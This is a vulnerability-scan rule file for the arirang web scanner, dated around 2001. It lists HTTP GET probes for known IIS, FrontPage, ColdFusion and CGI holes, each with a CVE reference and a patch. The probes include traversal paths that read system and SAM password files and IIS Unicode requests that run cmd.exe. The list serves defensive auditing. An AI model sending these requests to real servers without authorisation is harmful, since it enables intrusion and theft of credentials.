####################################################################################################################### # all.uxe (~2001/05/25) WWW (NT/Unix) Vulnerabilities scan rule for arirang. # (this scan rule use a GET method.) # # (c) 2000-2001 by pilot # http://www.monkey.org/~pilot # pilot@monkey.org # # supported complete patch information. # # # NOTICE : all.uxe check only IIS5 .printer check test (english,korean windows 2000 version) # so.. all.uxe cannot other language windows 2000 version. # # solution for other language windows 2000 version : # .printer ISAPI have a buffer overflow-high lisk # Disabling web based printing results in a registry entry. # HKLM\Software\Policies\Microsoft\windows NT\printers\DisableWebPrinting\n\tREG_DWORD 0x1 # This entry must be set to 1 for the .printer mapping to reliably be disabled. # or # if you didn't patch,you must to patch your server # http://www.microsoft.com/Downloads/Release.asp?ReleaseID=29321 # # Security Information. # Microsoft TechNet Security(Windows NT/2000 Patch MainSite) # http://www.microsoft.com/technet/security/ # # Microsoft Security Tools and IIS 4/5 Security CheckList # http://www.microsoft.com/technet/security/tools.asp # # Secure Internet Information Services 5 Checklist ( but old.. not so good) # http://www.microsoft.com/technet/security/iis5chk.asp # ###################################################################################################################### 200 OK-> GET :/iissamples/exair/search/advsearch.asp^ExAir Sample DoS;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449\n\tsolution:Delete all files and directories that contain sample site pages; 200 OK-> GET :/carbo.dll^iCat Carbo Server(carbo.dll);delete thisfile; 200 OK-> GET :/cgi-win/uploader.exe^Websites pro(uploader.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0177CVE-1999-0177\n\tsolution:http://website.oreilly.com; 200 OK-> GET :/search97.vts^search97.vts;http://www.verity.comverity website; 200 OK-> GET :/scripts/tools/newdsn.exe^Remote File create,IIS DoS(newdsn.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0191CVE-1999-0191\n\tsolution:delete this file ; 200 OK-> GET :/scripts/tools/getdrvs.exe^IIS 3.0 Remote File create(getdrvs.exe);solution:Delete all files and directories that contain sample site pages.\n\thttp://www.microsoft.com/technet/security/iischk.asp; 200 OK-> GET :/_vti_inf.html^Frontpage98 Hole(_vti_inf.html);FP extensions and the path on the server where the extensions are located.\n\tsolution:delete this file; 200 OK-> GET :/_vti_pvt/service.pwd^Frontpage98 Hole(service.pwd);http://www.securityfocus.com/vdb/bottom.html?vid=1205; 200 OK-> GET :/_vti_pvt/users.pwd^Frontpage98 Hole(users.pwd);http://www.securityfocus.com/vdb/bottom.html?vid=1205; 200 OK-> GET :/_vti_pvt/authors.pwd^Frontpage98 Hole(authors.pwd);http://www.securityfocus.com/vdb/bottom.html?vid=1205; 200 OK-> GET :/_vti_pvt/administrators.pwd^Frontpage98 Hole(administrators.pwd);http://www.securityfocus.com/vdb/bottom.html?vid=1205; 200 OK-> GET :/_vti_pvt/shtml.dll^Frontpage98 Hole(shtml.dll);http://www.securityfocus.com/vdb/bottom.html?vid=1205; 200 OK-> GET :/_vti_pvt/shtml.exe^Frontpage98 Hole(shtml.exe);http://www.securityfocus.com/vdb/bottom.html?vid=1205; 200 OK-> GET :/samples/search/queryhit.htm^Frontpage98 Helo(queryhit.htm);Rhino9 security advisory\n\tsolution:Delete all files and directories that contain sample site pages; #pws 200 OK-> GET :/....../autoexec.bat^Pws,Jana WebServer(dotdotdot);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0386CVE-1999-0386\n\tsolution:http://www.microsoft.com/technet/security/current.asp Microsoft Technet Security(ms99-010); 200 OK-> GET :/..../config.sys^Personal WebServer Hole B;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0386CVE-1999-0386\n\tsolution:http://www.microsoft.com/technet/security/current.aspMicrosoft Technet Security(ms99-010); #end pws 200 OK-> GET :/iisadmpwd/achg.htr^IIS Web Password Hole(achg.htr);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407\n\tsolution:Delete all files and directories that contain sample site pages; 200 OK-> GET :/iisadmpwd/aexp.htr^IIS Web Password Hole(aexp.htr);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407\n\tsolution:Delete all files and directories that contain sample site pages; 200 OK-> GET :/iisadmpwd/aexp2.htr^IIS Web Password Hole(aexp2.htr);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-040\n\tsolution:Delete all files and directories that contain sample site pages; 200 OK-> GET :/."./."./winnt/win.ini%20.php3^IIS CGI File parsing bug(win.ini);http://www.microsoft.com/technet/security/bulletin/ms00-086.asp; 200 OK-> GET :/iisadmpwd/aexp3.htr^IIS Web Password Hole(aexp3.htr);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407\n\tsolution:Delete all files and directories that contain sample site pages; 200 OK-> GET :/iisadmpwd/aexp4.htr^IIS Web Password Hole(aexp4.htr);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407\n\tsolution:Delete all files and directories that contain sample site pages; 200 OK-> GET :/iisadmpwd/aexp4b.htr^IIS Web Password Hole(aexp4b.htr);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407\n\tsolution:Delete all files and directories that contain sample site pages; 200 OK-> GET :/iisadmpwd/anot.htr^IIS Web Password Hole(anot.htr);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407\n\tsolution:Delete all files and directories that contain sample site pages; 200 OK-> GET :/iisadmpwd/anot3.htr^IIS Web Password Hole(anot3.htr);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0407\n\tsolution:Delete all files and directories that contain sample site pages; 200 OK-> GET :/cgi-bin/visadmin.exe^Omi HTTPD (visadmin.exe);OmniHTTPD visadmin.exe Denial of Service Vulnerability\n\tsolution:http://www.omnicron.ab.ca; 200 OK-> GET :/scripts/no-such-file.pl^IIS Perl Security Hole;IIS and Perl may be used to reveal true directory location\n\tsolution:delete perl.exe; 200 OK-> GET :/scripts/fpcount.exe^IIS (fpcount.exe) DoS;IIS counter Denial of Service\n\tsolution:delete fpcount.exe; 200 OK-> GET :/cgi-bin/rguest.exe^WebCom Guestbook Hole(rquest.exe);Webcom's CGI Guestbook Security Hole\n\tsolution:http://www.webcom.sewebcom homepage; 200 OK-> GET :/cgi-bin/wguest.exe^WebCom Guestbook Hole(wguest.exe);Webcom's CGI Guestbook Security Hole\n\tsolution:http://www.webcom.sewebcom homepage; 200 OK-> GET :/default.asp::$DATA^IIS Data Stream Hole;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0278CVE-1999-0278\n\tsolution:http://www.microsoft.com/technet/security/current.asp (MS98-003); 200 OK-> GET :/iissamples/exair/howitworks/codebrws.asp^IIS (codebrws.asp) Hole A;solution:delete this file or ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/; 200 OK-> GET :/iissamples/sdk/asp/docs/codebrws.asp^IIS (codebrws.asp) Hole B;solution:delete this file or ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/; 200 OK-> GET :/msadc/Samples/SELECTOR/showcode.asp^IIS (showcode.asp) Hole;solution:delete this file or ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/Viewcode-fix/; 200 OK-> GET :/adsamples/config/site.csc^SiteServer AdSamples(site.csc);http://www.securityfocus.com/vdb/bottom.html?vid=256; 200 OK-> GET :/scripts/iisadmin/ism.dll?http/dir^Peer Webservice Hole(ism.dll);solution:delete sample files; 200 OK-> GET :/AdvWorks/equipment/catalog_type.asp^ASP Sample ODBC Hole(catalog_type.asp);ASP sample ODBC Bug\n\tsolution:delete samples; #ColdFusion 200 OK-> GET :/cfdocs/expeval/openfile.cfm^ColdFusion Hole(openfile.cfm);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0477\n\thttp://www.allaire.com/products/coldfusion/index.cfmvendor homepage; 200 OK-> GET :/cfdocs/expeval/ExprCalc.cfm^ColdFusion Hole(explcalc.cfm);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0477\n\thttp://www.allaire.com/products/coldfusion/index.cfmvendor homepage; 200 OK-> GET :/cfdocs/expeval/displayopenedfile.cfm^ColdFusion Hole(displayopenedfile.cfm);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0477\n\thttp://www.allaire.com/products/coldfusion/index.cfmvendor homepage; 200 OK-> GET :/cfdocs/expeval/sendmail.cfm^ColdFusion Hole(sendmail.cfm);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0477\n\thttp://www.allaire.com/products/coldfusion/index.cfmvendor homepage; 200 OK-> GET :/getFile.cfm^ColdFusion Hole(getFile.cfm) ;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0477\n\thttp://www.allaire.com/products/coldfusion/index.cfmvendor homepage; #end ColdFusion #Alibaba Multiple CGI 200 OK-> GET :/cgi-bin/get32.exe^Alibaba Multiple CGI(get32.exe);http://www.allaire.com/products/coldfusion/index.cfm; 200 OK-> GET :/cgi-bin/alibaba.pl^Alibaba Multiple CGI(alibaba.pl);http://www.allaire.com/products/coldfusion/index.cfm; 200 OK-> GET :/cgi-bin/tst.bat^Alibaba Multiple CGI(tst.bat);http://www.allaire.com/products/coldfusion/index.cfm; #end Alibaba 200 OK-> GET :/index.asp%81^IIS Double Byte Hole;IIS double byte ASP source Reveal \n\tEnglish:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/usa/security/fesrc-fix\n\tSimplified Chinese: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/chs/security/fesrc-fix\n\tTraditional Chinese: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/cht/security/fesrc-fix\n\tJapanese:ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/jpn/security/fesrc-fix\n\tKorean: ftp://ftp.microsoft.com/bussys/iis/iis-public/fixes/kor/security/fesrc-fix; 200 OK-> GET :/../../../../../winnt/repair/sam._^TeamShare TeamTrack V3.0 Hole;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0933CVE-1999-0933\n\thttp://www.teamtrack.com; 200 OK-> GET :/cgi-bin/imagemap.exe^OmniHTTPd 1.01,Pro2.04 bof(imagemap.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0951\n\tsolution:delete this file; 200 OK-> GET :/cgi-bin/cgitest.exe^W4-Server2.6a(cgitest.exe);W4 Server Cgitest.exe Buffer Overflow Vulnerability\n\tsolution:delete this file; 200 OK-> GET :/../../../../config.sys^URL Live! 1.0 WebServer Hole;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0915; 200 OK-> GET :/scripts/webbbs.exe^WebBBS Hole(webbbs.exe);webbbs buffer overflow \n\tsolution:delete file; 200 OK-> GET :/cgi-bin/test.bat^AN-HTTPd 1.20b Hole(test.bat);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0947; 200 OK-> GET :/cgi-bin/input.bat^AN-HTTPd 1.20b Hole(input.bat);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0947; 200 OK-> GET :/cgi-bin/input2.bat^AN-HTTPd 1.20b Hole(input2.bat);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0947; 200 OK-> GET :/ssi/envout.bat^AN-HTTPd 1.20b Hole(envout.bat);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0947; 200 OK-> GET :/msadc/msadcs.dll^RDS Securty Hole(msadcs.dll);important patch\n\thttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1011\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms99-025.asp; 200 OK-> GET :/cgi-bin/htimage.exe^Frontpage path,buffer oveflow(htimage.exe);frontpage buffer overflow,path reveal\n\thttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0122CAN-2000-0122\n\thttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0256\n\tsolution:delete file; 200 OK-> GET :/test.idc^IIS Path Reveal(anything.idc);IIS Path Reveal; 200 OK-> GET :/test.idq^IIS Path Reveal(anything.idq);IIS Path Reveal; 200 OK-> GET :/test.ida^IIS Path Reveal(anything.ida);IIS Path Reveal; 200 OK-> GET :/test.idw^IIS Path Reveal(anything.idw);IIS Path Reveal; 200 OK-> GET :/scripts/counter.exe^counter.exe DoS;Counter.exe Denial of Service Vulnerabilities\n\tsolution:delete this file; 200 OK-> GET :/common/browser.inc^IIS ASP VBScript Error;bugtraq id 978; 200 OK-> GET :/cgi-bin/echo.bat^Sambar Server Batch CGI(echo.bat);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0213\n\thttp://www.sambar.com; 200 OK-> GET :/cgi-bin/hello.bat^Sambar Server Batch CGI(hello.bat);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0213\n\thttp://www.sambar.com; 200 OK-> GET :/rightfax/fuwww.dll^Right Fax Web Client (fuwww.dll);; 200 OK-> GET :/scripts/cgimail.exe^CGI Mailer Hole(cgimail.exe);; 200 OK-> GET :/default.asp\\^IIS UNC Mapping Hole;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0246\n\thttp://www.microsoft.com/technet/security/bulletin/MS00-019.asp; 200 OK-> GET :/officescan/cgi/jdkRqNotify.exe^Trend OfficeScan Hole(jdkRqNotify.exe);Trend Micro OfficeScan\n\tsolution:http://www.antivirus.com/download/ofce_patch.htm; 200 OK-> GET :/ows-bin/perlidlc.bat?&dir^Oracle Web Listener Batch Hole(*.bat);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0169; 200 OK-> GET :/cgi-bin/windmail.exe^WinMail Hole (winmail.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0242\n\thttp://www.geocel.com/windmail/index.htm; 200 OK-> GET :/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full^Malform Hit-Highlighting(qfullhit.htw)A;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0097\n\thttp://www.microsoft.com/technet/Security/Bulletin/ms00-006.aspMS00-006.asp; 200 OK-> GET :/iissamples/exair/search/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full^Malform Hit-Highlighting(qfullhit.htw) B;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0097\n\thttp://www.microsoft.com/technet/Security/Bulletin/ms00-006.aspMS00-006.asp; 200 OK-> GET :/null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full^Index Server Security Hole(null.htw);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0097\n\thttp://www.microsoft.com/technet/Security/Bulletin/ms00-006.aspMS00-006.asp; 200 OK-> GET :/_vti_bin/_vti_aut/dvwssr.dll^MS frontpage98 BackDoor,buffer overflow(dvwssr.dll);backdoor and buffer overflow\n\thttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0260\n\tsolution:delete this file; 500-> GET :/_vti_bin/_vti_aut/dvwssr.dll^MS frontpage98 BackDoor,buffer overflow(dvwssr.dll);backdoor and buffer overflow\n\thttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0260\n\tsolution:delete this file; 401-> GET :/_vti_bin/_vti_aut/dvwssr.dll^MS frontpage98 BackDoor,buffer overflow(dvwssr.dll);backdoor and buffer overflow\n\thttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0260\n\tsolution:delete this file; 200 OK-> GET :/scripts/wa.exe^Web Archive version 1.8d bof(wa.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0425\n\thttp://www.lsoft.com; 200 OK-> GET :/scripts/cart32.exe^Cart32 Backdoor(cart32.exe);bugtraq id 1153\n\thttp://www.lsoft.com; 200 OK-> GET :/scripts/c32web.exe^Cart32 Backdoor(c32web.exe);bugtraq id 1153\n\thttp://www.lsoft.com; 200 OK-> GET :/scripts/gupcgi.exe^DNews News Server bof(gupcgi.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0423\n\thttp://www.netwinsite.com; 200 OK-> GET :/scripts/dnewsweb.exe^DNews News Server bof(dnewsweb.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0423\n\thttp://www.netwinsite.com; 200 OK-> GET :/scripts/dmailweb.exe^DMailweb bof(dmailweb.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0423\n\thttp://www.netwinsite.com; 200 OK-> GET :/process_bug.cgi^Bugzilla 2.8(process_bug.cgi);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0421; 200 OK-> GET :/enter_bug.cgi^Bugzilla 2.8(enter_bug.cgi);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0421; 200 OK-> GET :/cgi-bin/wconsole.dll^Rockliffe MailSite bof(wconsole.dll);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0398\n\tsolution:http://www.rockliffe.com; 200 OK-> GET :/scripts/Carello/add.exe^Pacific Soft Carello(add.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0396\n\tsolution:http://www.carelloweb.com; 200 OK-> GET :/cgi-bin/redirect.exe^PDGsoft Shopping Cart(redirect.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0401\n\tsolution:http://www.pdgsoft.com/Security/security2.html; 200 OK-> GET :/cgi-bin/changepw.exe^PDGsoft Shopping Cart(changepw.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0401\n\tsolution:http://www.pdgsoft.com/Security/security2.html; 200 OK-> GET :/cgi-bin/ceilidh.exe^Ceilidh 2.60a (ceilidh.exe);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0555\n\tsolution:delete this file; 200 OK-> GET :/index.JSP^Multi JSP Source (JSP);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0499; 200 OK-> GET :/file/index.jsp^BEA system WebLogic Server(index.jsp);solution:http://www.weblogic.com; 200 OK-> GET :/servlet/SessionServlet^Allaire JRun 2.3.x (SessionServlet);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0540\n\tsolution:http://www.allaire.com; 200 OK-> GET :/_vti_bin/shtml.dll/nosuch.htm^FrontPage 2k <=1.1 Path vul;thttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0413\n\tsolution:http://msdn.microsoft.com/workshop/languages/fp/2000/winfpse.asp; 200 OK-> GET :/_vti_bin/shtml.dll^FrontPage 2k,IIS Multiple (shtml.dll);http://www.microsoft.com/technet/security/CSOverv.asp\n\tsolution:http://msdn.microsoft.com/workshop/languages/fp/2000/winfpse.asp; 200 OK-> GET :/cfide/administrator/index.cfm^Cold Fusion 4.5.1 DoS (index.cfm);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0538\n\tsolution:http://www.allaire.com; 200 OK-> GET :/cgi-bin/bb-hostsvc.sh^BB4 Big Brother (bb-hostsvc.sh);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0638\n\tsolution:http://bb4.comvendor homepage; 200 OK-> GET :/..\\..\\..\winnt\repair\sam._^Deerfield WorldClient 2.1 Directory vul;http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0660\n\tsolution:http://www.altn.com; 200 OK-> GET :/global.asa+.htr^IIS 4.0/5.0 Source Vul(+.htr);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0630\n\tsolution:IIS4 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=22709\n\tIIS5 http://www.microsoft.com/Downloads/Release.asp?ReleaseID=22708; 200 OK-> GET :/bin/common/user_update_passwd.pl^Blackboard 4.0 (user_update_passwd.pl);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0627\n\tsolution:http://download.blackboard.com; 200 OK-> GET :/bin/common/user_update_admin.pl^Blackboard 4.0 (user_update_admin.pl);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0627\n\tsolution:http://download.blackboard.com; 200 OK-> GET :/cgi-bin/post32.exe^Alibab Web Piped Vul (post32.exe);http:\\csm.alcyonis.frvendor homepage\n\tsolution:delete this file; 200 OK-> GET :/cgi-bin/lsindex2.bat^Alibab Web Piped Vul (lsindex2.bat);http:\\csm.alcyonis.frvendor homepage\n\tsolution:delete this file; 200 OK-> GET :/_vti_bin/fpcount.exe?Page=default.htm|Image=2|Digits=1 ^Frontpage97 fpcount bof(fpcount.exe);solution:delete fpcount.exe; 200 OK-> GET :/page.cfm^ColdFusion ODBC (page.cfm);http://www.allaire.comvendor homepage\n\tsolution:delete this file; 200 OK-> GET :/scripts/samples/details.idc^NT ODBC (details.idc);solution:Delete all files and directories that contain sample site pages.; 200 OK-> GET :/../../windows/user.dat^SimpleServer 1.06 (dotdot);http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0664\n\tsolution:http://www.analogx.com/contents/download/network/sswww.htm; 200 OK-> GET :/_vti_bin/shtml.exe^FrontPage MS-DOS Device DoS(shtml.exe);http://msdn.microsoft.com/workshop/languages/fp/2000/sr12.asp\n\tdelete this file; 200 OK-> GET :/search.dll?search?query=%00&logic=AND^Sambar Server Search CGI 1;Disable search capability by removing search.dll; 200 OK-> GET :/search.dll?search?query=/&logic=AND^Sambar Server Search CGI 2;Disable search capability by removing search.dll; 200 OK-> GET :/cgi-bin/webplus.exe^Web+ multiple(webplus.exe);http://www.talentsoft.com; 200 OK-> GET :/_private/shopping_cart.mdb^Shopping Cart 2.0(shopping_cart.mdb);http://www.smartwin.com.au/cybershop.htm; 200 OK-> GET :/Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0^PHPix Directory;http://phpix.org; 200 OK-> GET :/cgi-bin/Web_Store/web_store.cgi^WebStore Directory(web_store.cgi);http://www.extropia.com/download.html; 200 OK-> GET :/cgi-bin/shopper.cgi^Web Shopper Directory(shopper.cgi);http://www.bytesinteractive.com; 200 OK-> GET :/cgi-bin/shop.cgi^Hassan Shopping Cart (shop.cgi);http://www.irata.com/products.html; # high lisk Microsoft IIS 4.0 / 5.0 UNICODE file read & Remote Execute 200 OK-> GET :/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini^IIS 4/5 UNICODE;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp; 200 OK-> GET :/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 1;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp; 200 OK-> GET :/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 2;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp; 200 OK-> GET :/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 3;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp; 200 OK-> GET :/cgi-bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 4;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp; 200 OK-> GET :/_vti_cnf/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 5;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp; 200 OK-> GET :/bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 6;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp; 200 OK-> GET :/cgi/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 7;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp; 200 OK-> GET :/exchange/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 8;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp; 200 OK-> GET :/adsamples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 9;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp; 200 OK-> GET :/PBServer/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 10;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp; 200 OK-> GET :/samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 11;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp; 200 OK-> GET :/Rpc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 12;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp; 200 OK-> GET :/_mem_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir^IIS 4/5 UNICODE Remote Execute Check method 13;important patch\n\tsolution:http://www.microsoft.com/technet/security/bulletin/ms00-057.asp; # end Microsoft IIS 4.0 / 5.0 UNICODE file read & Remote Execute #high lisk IIS File Parsing Vulnerability Remote Execute Check 200 OK-> GET :/scripts/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c%20dir%20C:\^IIS File Parsing Vulnerability Check method 1;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873; 200 OK-> GET :/msadc/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 2;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873; 200 OK-> GET :/Rpc/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 3;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873; 200 OK-> GET :/samples/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 4;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873; 200 OK-> GET :/PBServer/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 5;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873; 200 OK-> GET :/_vti_cnf/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 6;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873; 200 OK-> GET :/_vti_bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 7;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873; 200 OK-> GET :/bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 8;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873; 200 OK-> GET :/cgi-bin/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 9;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873; 200 OK-> GET :/cgi/check.bat/..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir^IIS File Parsing Vulnerability Check method 10;IIS 5 http://download.microsoft.com/download/win2000platform/Patch/Q277873/NT5/EN-US/Q277873_W2K_SP2_x86_en.EXE\n\tIIS4 http://www.microsoft.com/ntserver/nts/downloads/critical/q277873; 200 OK-> GET 